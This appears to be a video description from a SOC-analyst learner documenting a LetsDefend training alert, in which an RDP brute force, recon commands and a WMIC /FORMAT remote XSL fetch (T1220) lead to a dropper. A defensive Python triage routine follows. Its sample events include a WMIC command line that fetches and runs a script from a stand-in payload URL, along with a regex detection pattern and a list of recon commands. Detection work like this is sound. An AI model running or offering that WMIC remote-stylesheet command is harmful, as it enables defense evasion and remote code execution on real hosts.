XSL Script via WMIC.EXE — RDP Brute Force, LOLBin Execution & SILENTBUILDER | LetsDefend SOC310

Published: 15 May 2026
on channel: InkSec

Day 114 of Becoming a SOC Analyst — SOC310 XSL Script Execution Via WMIC.EXE (True Positive)
RDP brute force from 146.70.246.119 (confirmed malicious via AbuseIPDB) succeeded against user letsdefend on host Ambrosine (172.16.17.113), followed by hands-on-keyboard recon — arp -a, netstat -an, net localgroup administrators, whoami, runas powershell. The attacker then used WMIC /FORMAT to fetch and execute a remote XSL script over HTTP — a classic T1220 LOLBin technique to bypass defenses — with the payload URL flagged malicious and attributed to SILENTBUILDER, a dropper/downloader associated with a Conti subgroup. Device action was Allowed at execution time — no additional outbound connections observed, endpoint contained.
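As an added, defender-side illustration (not code from the video, from LetsDefend, or from the scenario itself), the routine below triages process-creation events for the WMIC /FORMAT pattern described above: it flags invocations whose stylesheet argument is a remote URL or a custom .xsl file and records how many of the recon commands the same user ran on that host beforehand. The event records, hostnames, usernames and the payload URL are constructed samples.

```python
import re
from collections import Counter

# Constructed sample process-creation events (illustrative only, not real telemetry).
SAMPLE_EVENTS = [
    {"host": "Ambrosine", "user": "letsdefend", "cmdline": "arp -a"},
    {"host": "Ambrosine", "user": "letsdefend", "cmdline": "netstat -an"},
    {"host": "Ambrosine", "user": "letsdefend", "cmdline": "net localgroup administrators"},
    {"host": "Ambrosine", "user": "letsdefend", "cmdline": "whoami"},
    {"host": "Ambrosine", "user": "letsdefend",
     "cmdline": 'wmic os get /FORMAT:"http://payload.example.invalid/wmicscript.xsl"'},
    {"host": "Ambrosine", "user": "svc_inventory", "cmdline": "wmic computersystem get model"},
    {"host": "Ambrosine", "user": "svc_inventory", "cmdline": "wmic process list brief /format:csv"},
]

# Captures whatever follows /format: (optionally quoted) up to the next space or quote.
FORMAT_ARG = re.compile(r'/format:\s*"?([^\s"]+)', re.IGNORECASE)
# Hands-on-keyboard recon commands seen in the scenario.
RECON_CMDS = ("arp -a", "netstat -an", "net localgroup administrators", "whoami")

def classify_wmic(cmdline):
    """Return 'high', 'medium' or None for a single command line."""
    if not re.search(r"\bwmic(\.exe)?\b", cmdline, re.IGNORECASE):
        return None
    m = FORMAT_ARG.search(cmdline)
    if not m:
        return None
    target = m.group(1).lower()
    if target.startswith(("http://", "https://", "\\\\")):
        return "high"      # stylesheet fetched from a remote location (T1220 pattern)
    if target.endswith(".xsl"):
        return "medium"    # local custom stylesheet: still script execution via WMIC
    return None            # built-in output formats such as csv, list or htable

def triage(events):
    """Flag WMIC stylesheet execution and count prior recon per (host, user)."""
    findings, recon = [], Counter()
    for e in events:
        key = (e["host"], e["user"])
        if e["cmdline"].strip().lower().startswith(RECON_CMDS):
            recon[key] += 1
        sev = classify_wmic(e["cmdline"])
        if sev:
            findings.append({"host": e["host"], "user": e["user"], "severity": sev,
                             "recon_before": recon[key], "cmdline": e["cmdline"]})
    return findings
```

Running `triage(SAMPLE_EVENTS)` yields a single high-severity finding for the remote XSL fetch, with four recon commands by the same user recorded before it, while the inventory account's benign WMIC queries produce nothing.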
🔬 Analysis Reports
🔍 AbuseIPDB (146.70.246.119) → https://www.abuseipdb.com/check/146.7...
🦠 VirusTotal (wmicscript.xsl URL) → https://www.virustotal.com/gui/url/c1...
Scenario sourced from LetsDefend.io — one of the best hands-on SOC analyst training platforms out there.
Highly recommend if you're on the same path. I'm documenting every day of my journey to landing a Level 1 SOC Analyst role — the wins, the grinds, and everything in between.
🔵 What I Cover
Threat Detection · Alert Triage · SIEM Analysis · Log Analysis · Incident Response · Blue Team Tools
🚨 Open to Work — Seeking a Level 1 SOC Analyst role in Melbourne or Remote (AU)
📂 Portfolio → inksec.io
💼 LinkedIn → linkedin.com/in/tate-pannam-8b64b23a3
If you chose the red pill... 0x74617465.sh
#SOCAnalyst #BlueTeam #Cybersecurity #WMIC #LOLBins #XSLScript #RDPBruteForce #Conti #SILENTBUILDER #DefenseEvasion #IncidentResponse #SIEM #Day114 #CyberSecurityJourney #Melbourne #LetsDefend #LetsDefendSOC #ThreatHunting #InfoSec #BlueTeamSecurity